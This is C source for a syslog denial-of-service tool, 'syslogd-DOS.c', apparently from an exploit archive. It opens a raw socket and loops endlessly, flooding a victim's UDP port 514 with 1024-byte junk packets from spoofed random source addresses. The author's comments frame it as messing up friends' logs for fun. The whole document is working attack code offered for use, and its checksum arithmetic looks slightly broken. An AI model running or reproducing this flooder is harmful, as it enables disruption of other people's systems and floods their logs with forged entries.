This source code, once compiled, can be used to toy with a system's syslogd. Note: syslogd must be running with the -r option on Linux, or -u on BSD.
3e33443698d216d8305123c81221599b237541fe9f6f5ab917ce91785f6542e4
/*
* syslogd-DOS.c
*
* Mess up your friends syslogs for fun!
*
* lore <fiddler@antisocial.com>
*
* Note: syslogd must be running with the -r option on Linux,
* or -u on BSD
*
* Note also: Not only is the box slowed down by logging all of this
* crap, it also reverse resolves all the IPs, slowing it down even
* more.
*
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <linux/udp.h>
#include <netinet/ip.h>
#include <netdb.h>
#define TRUE (0x00000001)
#define FALSE (0x00000000)
#define ERR (0xffffffff)
#define SYSLOG_PORT 514
#define __BSD_SOURCE /* The BSD ip header is prettier */
#define IP_SIZE (sizeof(ip_h))
#define UDP_SIZE (sizeof(udp_h))
#define DATA_SIZE (1024)
#define IP_OFF (0)
#define UDP_OFF (IP_SIZE)
#define DATA_OFF (UDP_OFF + UDP_SIZE)
#define PSIZE (IP_SIZE + UDP_SIZE + DATA_SIZE)
typedef struct ip ip_h;
typedef struct udphdr udp_h;
typedef char data_h;
typedef u_short port_t;
typedef u_long ip_t;
typedef long sock_t;
int main __P ((int, char * *));
char * random_message __P ((char *));
int spoof_udp_packet __P ((sock_t, ip_t, ip_t, port_t, char *, char *));
ip_t res __P ((char *));
u_short generate_checksum __P ((u_short *, int));
int main (int argc, char * * argv)
{
sock_t fd;
char * yes = "1";
ip_t from, victim;
port_t port;
char p[PSIZE];
char mesg[DATA_SIZE];
if (argc < 2)
{
fprintf(stderr, "Usage: %s <victim> [port]\n", *argv);
exit(EXIT_FAILURE);
}
else if ((victim = res(argv[1])) == ERR)
{
fprintf(stderr, "Could not resolve '%s': %s\n",
argv[1], strerror(errno));
exit(EXIT_FAILURE);
}
else if (!(port = (argc > 2) ? atoi(argv[2]) : SYSLOG_PORT))
{
fprintf(stderr, "Bad port '%s'\n", argv[2]);
exit(EXIT_FAILURE);
}
else if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERR)
{
fprintf(stderr, "Could not create socket: %s\n",
strerror(errno));
exit(EXIT_FAILURE);
}
else if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, (char *)&yes,
sizeof(yes)))
{
fprintf(stderr, "Could not set socket options: %s\n",
strerror(errno));
exit(EXIT_FAILURE);
}
srand((unsigned)time(NULL));
fprintf(stderr, "syslogd-DoS.c by lore <fiddler@antisocial.com>\n");
fprintf(stderr, "Hitting %s:%d\n", argv[1], port);
while (1)
{
from = rand() % 9999999 + 1;
if ((spoof_udp_packet(fd, from, victim, port, p,
random_message(mesg))) == ERR)
{
fprintf(stderr, "Could not send packet: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
fprintf(stderr, ".");
}
}
char * random_message (char * mesg)
{
int i;
memset(mesg, 0, DATA_SIZE);
for (i = 0; i < DATA_SIZE; ++i)
{
mesg[i] = rand() % 255 + 1;
}
return (mesg);
}
int spoof_udp_packet
(sock_t fd, ip_t from, ip_t to, port_t port, char * p, char * data)
{
ip_h * ip_ptr;
udp_h * udp_ptr;
data_h * data_ptr;
struct sockaddr_in sa;
memset(p, 0, PSIZE);
ip_ptr = (ip_h *)(p + IP_OFF);
udp_ptr = (udp_h *)(p + UDP_OFF);
data_ptr = (data_h *)(p + DATA_OFF);
ip_ptr->ip_hl = 5;
ip_ptr->ip_v = 4;
ip_ptr->ip_tos = 0;
ip_ptr->ip_len = PSIZE;
ip_ptr->ip_id = rand() % 31337 + 1;
ip_ptr->ip_off = 0;
ip_ptr->ip_ttl = 255;
ip_ptr->ip_p = IPPROTO_UDP;
ip_ptr->ip_sum = 0;
// ip_ptr->ip_sum = generate_checksum((u_short *)ip_ptr, IP_SIZE);
ip_ptr->ip_src.s_addr = from;
ip_ptr->ip_dst.s_addr = to;
udp_ptr->source = htons(514);
udp_ptr->dest = htons(514);
udp_ptr->len = htons(UDP_SIZE + DATA_SIZE);
udp_ptr->check = generate_checksum((u_short *)ip_ptr, PSIZE);
//IP_SIZE +
//UDP_SIZE + DATA_SIZE);
strcpy(data_ptr, data);
sa.sin_port = htons(514);
sa.sin_addr.s_addr = to;
sa.sin_family = AF_INET;
return (sendto(fd, p, PSIZE, 0, (struct sockaddr *)&sa,
sizeof(struct sockaddr_in)));
}
ip_t res (char * host)
{
struct in_addr addr;
struct hostent * hp;
if ((addr.s_addr = inet_addr(host)) == ERR)
{
if (!(hp = gethostbyname(host))) return (ERR);
memcpy(&addr.s_addr, hp->h_addr, hp->h_length);
}
return (addr.s_addr);
}
u_short generate_checksum (u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
/* EOF */